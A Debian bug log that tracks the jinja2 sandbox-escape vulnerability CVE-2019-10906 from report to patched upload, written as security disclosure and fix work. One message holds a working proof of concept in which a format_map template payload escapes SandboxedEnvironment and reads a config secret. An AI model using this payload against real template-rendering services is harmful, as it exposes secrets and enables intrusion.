Debian Bug report logs -
#926602
jinja2: CVE-2019-10906
Reported by: Salvatore Bonaccorso <carnil@debian.org>
Date: Sun, 7 Apr 2019 17:21:01 UTC
Severity: grave
Tags: patch, security, upstream
Found in versions jinja2/2.10-1, jinja2/2.7.3-1, jinja2/2.8-1
Fixed in version jinja2/2.10-2
Done: Piotr Ożarowski <piotr@debian.org>
Reply or subscribe to this bug.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, team@security.debian.org, Piotr Ożarowski <piotr@debian.org>:
Bug#926602; Package src:jinja2.
(Sun, 07 Apr 2019 17:21:04 GMT) (full text, mbox, link).
Acknowledgement sent
to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, team@security.debian.org, Piotr Ożarowski <piotr@debian.org>.
(Sun, 07 Apr 2019 17:21:04 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Source: jinja2
Version: 2.10-1
Severity: grave
Tags: patch security upstream
Hi,
The following vulnerability was published for jinja2.
CVE-2019-10906[0]:
| In Pallets Jinja before 2.10.1, str.format_map allows a sandbox
| escape.
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2019-10906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10906
[1] https://palletsprojects.com/blog/jinja-2-10-1-released/
[2] https://github.com/pallets/jinja/commit/a2a6c930bcca591a25d2b316fcfd2d6793897b26
Please adjust the affected versions in the BTS as needed.
Regards,
Salvatore
Information forwarded
to debian-bugs-dist@lists.debian.org, Piotr Ożarowski <piotr@debian.org>:
Bug#926602; Package src:jinja2.
(Mon, 08 Apr 2019 07:39:07 GMT) (full text, mbox, link).
Acknowledgement sent
to Hugo Lefeuvre <hle@debian.org>:
Extra info received and forwarded to list. Copy sent to Piotr Ożarowski <piotr@debian.org>.
(Mon, 08 Apr 2019 07:39:07 GMT) (full text, mbox, link).
Message #10 received at 926602@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Hi,
I'm working on a potential jinja2 Debian LTS security update. Here is a
proof of concept which allows to easily reproduce the issue. This should
help confirming vulnerability in other suites.
>>> from jinja2.sandbox import SandboxedEnvironment
>>> env = SandboxedEnvironment()
>>> config = {'SECRET_KEY': '12345'}
>>> class User(object):
... def __init__(self, name):
... self.name = name
...
>>> t = env.from_string('{{
>>> "{x.__class__.__init__.__globals__[config]}".format_map(dic) }}')
>>> t.render(dic={"x": User('joe')})
"{'SECRET_KEY': '12345'}"
Expected behaviour would be jinja2.exceptions.SecurityError.
Adapted from[0].
regards,
Hugo
[0] https://palletsprojects.com/blog/jinja-281-released/
--
Hugo Lefeuvre (hle) | www.owl.eu.com
RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD
ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C
[signature.asc (application/pgp-signature, inline)]
Marked as found in versions jinja2/2.8-1.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Mon, 08 Apr 2019 08:09:06 GMT) (full text, mbox, link).
Marked as found in versions jinja2/2.7.3-1.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Mon, 08 Apr 2019 08:09:08 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org, Piotr Ożarowski <piotr@debian.org>:
Bug#926602; Package src:jinja2.
(Mon, 08 Apr 2019 08:45:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Hugo Lefeuvre <hle@debian.org>:
Extra info received and forwarded to list. Copy sent to Piotr Ożarowski <piotr@debian.org>.
(Mon, 08 Apr 2019 08:45:03 GMT) (full text, mbox, link).
Message #19 received at 926602@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
> This should help confirming vulnerability in other suites.
2.7.3-1 and all later releases affected. In addition, both 2.7.3-1 and
2.8-1 are affected by the previous str.format issue[0].
[0] https://palletsprojects.com/blog/jinja-281-released/
--
Hugo Lefeuvre (hle) | www.owl.eu.com
RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD
ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C
[signature.asc (application/pgp-signature, inline)]
Information forwarded
to debian-bugs-dist@lists.debian.org, Piotr Ożarowski <piotr@debian.org>:
Bug#926602; Package src:jinja2.
(Mon, 08 Apr 2019 13:15:12 GMT) (full text, mbox, link).
Acknowledgement sent
to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Piotr Ożarowski <piotr@debian.org>.
(Mon, 08 Apr 2019 13:15:12 GMT) (full text, mbox, link).
Message #24 received at 926602@bugs.debian.org (full text, mbox, reply):
Hi Hugo,
On Mon, Apr 08, 2019 at 10:04:35AM +0200, Hugo Lefeuvre wrote:
> > This should help confirming vulnerability in other suites.
>
> 2.7.3-1 and all later releases affected. In addition, both 2.7.3-1 and
> 2.8-1 are affected by the previous str.format issue[0].
>
> [0] https://palletsprojects.com/blog/jinja-281-released/
CVE-2016-10745 was assigned for this issue.
Regards,
Salvtore
Information forwarded
to debian-bugs-dist@lists.debian.org, Piotr Ożarowski <piotr@debian.org>:
Bug#926602; Package src:jinja2.
(Mon, 08 Apr 2019 21:03:09 GMT) (full text, mbox, link).
Acknowledgement sent
to Hugo Lefeuvre <hle@debian.org>:
Extra info received and forwarded to list. Copy sent to Piotr Ożarowski <piotr@debian.org>.
(Mon, 08 Apr 2019 21:03:09 GMT) (full text, mbox, link).
Message #29 received at 926602@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Hi Salvatore,
> CVE-2016-10745 was assigned for this issue.
Thanks for the information.
I just noticed you added CVE-2016-10745 to the tracker. I am fairly
confused, do you know why this CVE was not referenced in the tracker?
Or did you just request it?
cheers,
Hugo
--
Hugo Lefeuvre (hle) | www.owl.eu.com
RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD
ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C
[signature.asc (application/pgp-signature, inline)]
Information forwarded
to debian-bugs-dist@lists.debian.org, Piotr Ożarowski <piotr@debian.org>:
Bug#926602; Package src:jinja2.
(Tue, 09 Apr 2019 04:39:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Piotr Ożarowski <piotr@debian.org>.
(Tue, 09 Apr 2019 04:39:03 GMT) (full text, mbox, link).
Message #34 received at 926602@bugs.debian.org (full text, mbox, reply):
Hi Hugo,
On Mon, Apr 08, 2019 at 10:20:29PM +0200, Hugo Lefeuvre wrote:
> Hi Salvatore,
>
> > CVE-2016-10745 was assigned for this issue.
>
> Thanks for the information.
>
> I just noticed you added CVE-2016-10745 to the tracker. I am fairly
> confused, do you know why this CVE was not referenced in the tracker?
> Or did you just request it?
It was not referenced, because there was not CVE yet. I was irritated
that for the later issue apparently a CVE Was assigned, but not for
the original first issue, so I requested a CVE for it.
It would have showed up on next CVE list update, bug given I got the
confirmation from MITRE on the assignment I then already added it to
the tracker.
So in short, yes I did rquest the CVE and was assigned yesterday.
Regards,
Salvatore
Message sent on
to Salvatore Bonaccorso <carnil@debian.org>:
Bug#926602.
(Tue, 09 Apr 2019 14:33:03 GMT) (full text, mbox, link).
Message #37 received at 926602-submitter@bugs.debian.org (full text, mbox, reply):
Control: tag -1 pending
Hello,
Bug #926602 in jinja2 reported by you has been fixed in the
Git repository and is awaiting an upload. You can see the commit
message below and you can check the diff of the fix at:
https://salsa.debian.org/python-team/modules/jinja2/commit/780a157c0466ac02204a8707ce7c06b6b011203f
------------------------------------------------------------------------
* Team upload.
* CVE-2019-10906: In Pallets Jinja before 2.10.1, str.format_map allows a
sandbox escape. Applied upstream patch: sandbox_str.format_map.patch
(Closes: #926602).
------------------------------------------------------------------------
(this message was generated automatically)
--
Greetings
https://bugs.debian.org/926602
Added tag(s) pending.
Request was from Thomas Goirand <zigo@debian.org>
to 926602-submitter@bugs.debian.org.
(Tue, 09 Apr 2019 14:33:03 GMT) (full text, mbox, link).
Reply sent
to Piotr Ożarowski <piotr@debian.org>:
You have taken responsibility.
(Tue, 09 Apr 2019 20:42:09 GMT) (full text, mbox, link).
Notification sent
to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer.
(Tue, 09 Apr 2019 20:42:09 GMT) (full text, mbox, link).
Message #44 received at 926602-close@bugs.debian.org (full text, mbox, reply):
Source: jinja2
Source-Version: 2.10-2
We believe that the bug you reported is fixed in the latest version of
jinja2, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 926602@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Piotr Ożarowski <piotr@debian.org> (supplier of updated jinja2 package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Tue, 09 Apr 2019 21:58:20 +0200
Source: jinja2
Binary: python-jinja2 python-jinja2-doc python3-jinja2
Architecture: source all
Version: 2.10-2
Distribution: unstable
Urgency: high
Maintainer: Piotr Ożarowski <piotr@debian.org>
Changed-By: Piotr Ożarowski <piotr@debian.org>
Description:
python-jinja2 - small but fast and easy to use stand-alone template engine
python-jinja2-doc - documentation for the Jinja2 Python library
python3-jinja2 - small but fast and easy to use stand-alone template engine
Closes: 926602
Changes:
jinja2 (2.10-2) unstable; urgency=high
.
[ Thomas Goirand ]
* CVE-2019-10906: In Pallets Jinja before 2.10.1, str.format_map allows a
sandbox escape. Applied upstream patch: sandbox_str.format_map.patch
(Closes: #926602).
Checksums-Sha1:
ad35571166658a559fe50d46c53ccda31a1fdfe3 2188 jinja2_2.10-2.dsc
bc2a7fcc95f26af7b45a839e8e42c3cbfa8240f7 7612 jinja2_2.10-2.debian.tar.xz
920ba33b164cd87ff1020c2aaeff24d904696fc2 7870 jinja2_2.10-2_amd64.buildinfo
a8c1502e3f5ec43c20583212f89fe77a5e4dda40 169572 python-jinja2-doc_2.10-2_all.deb
4998b0bac85db510ec5422ed6b5056ef53b0448e 105804 python-jinja2_2.10-2_all.deb
d32fd421186c32f236eb91462e98ea16af8d96a1 106500 python3-jinja2_2.10-2_all.deb
Checksums-Sha256:
249b2258365a9a00877676e910695831ef38725f29c27dd1796951176a8b084e 2188 jinja2_2.10-2.dsc
ad9348e80c397ff351b0a3b9dc8f9da7d19f450ad35939157a9f0691fb5a4326 7612 jinja2_2.10-2.debian.tar.xz
de666d7a5300290405a629af59ae2d5b69b8eb35c7ab18b5cff6a7a080fd4069 7870 jinja2_2.10-2_amd64.buildinfo
d099f8f265e0419ac1713db503655bddf0581ec9fb96cf138f0b058a2df9bf42 169572 python-jinja2-doc_2.10-2_all.deb
edba7679b955edfa8b02d9fa9c3a31e2aa8f8c2292b940d9f8fe2bb8af1ce8c0 105804 python-jinja2_2.10-2_all.deb
a9e5f3c829454f0277fdbee499ab9060a9424e565c923259d35612d5e2216284 106500 python3-jinja2_2.10-2_all.deb
Files:
f46478e5ecf225026c6ad771a92143a7 2188 python optional jinja2_2.10-2.dsc
467632bf04e415df5ab2d3d1f8900f17 7612 python optional jinja2_2.10-2.debian.tar.xz
01c580fcb8404948be1729ae33589901 7870 python optional jinja2_2.10-2_amd64.buildinfo
052879a04049ed5d77e630bdf4ffa692 169572 doc optional python-jinja2-doc_2.10-2_all.deb
6b8a4a47829e126f40b227ad5a7d1f08 105804 python optional python-jinja2_2.10-2_all.deb
ee244b485fadaad460ebc7cef0fda2b8 106500 python optional python3-jinja2_2.10-2_all.deb
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEHS+omFjar2IXhi33rvbxoqdFdkUFAlys+hcACgkQrvbxoqdF
dkUgUg/+PI6kSahVNByBsipVdlkc1aQoANWzmZFtDpAFqxe7FOlc9uBdAkXSG4JN
Yz/dVE6eJbyo0xn7PMesFhmmX9hHQcCtSorac5BBcncwArl6mOuP+QFpmqBsa7Bu
fM3oDvNsvjwQb2N5No8xFRIMyihnLjN4fchYNLYippjdmSzQR9RY22nkgC3c9amY
dCVxb3kUPL3H26QO0s9sgpXcQgvCouTwIhI+1PgwfRnLSNqdsG0JotY1a82DOJUy
An9QGI0QwaWArvpMUaO99b+SX17iZJW3e3fIU4801QkvEyrAoLGx0wzN1bcLAhv/
nZutNLVP+y9xhw+spSZ4eQjw6lbDNMQCuTkAJLY20U3kIMMG13rZ+QTM8nN5SpX3
0eaoyBeMByaRmoUfo4Ia5udpMoj3GLmc2ElBSuHexSWyv7lzYj5ErSssEj+CD965
Vg1SuwirbubKAUoFV5iQNpszczLtzH3FxoG1KfWRVza8cmfKhz4Xl/eqc/HcE04w
q1RPQq4URWGoaoVL2/RXCnEmhLUobC2LFF+cNCvv8880RDv538A59+961uguGnL9
NfHdaXKQxqNfcpEzJ1dYVnbjFhcTpAe89MOL05ovw7rah0yPt3CxAeTg1GttEYrf
P127OBBU+hdNyX/a4VxrnIzGwFBlr7p5mUrCCqGC0Jiiw9djWT8=
=UhFq
-----END PGP SIGNATURE-----
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 15:43:39 2019;
Machine Name:
buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon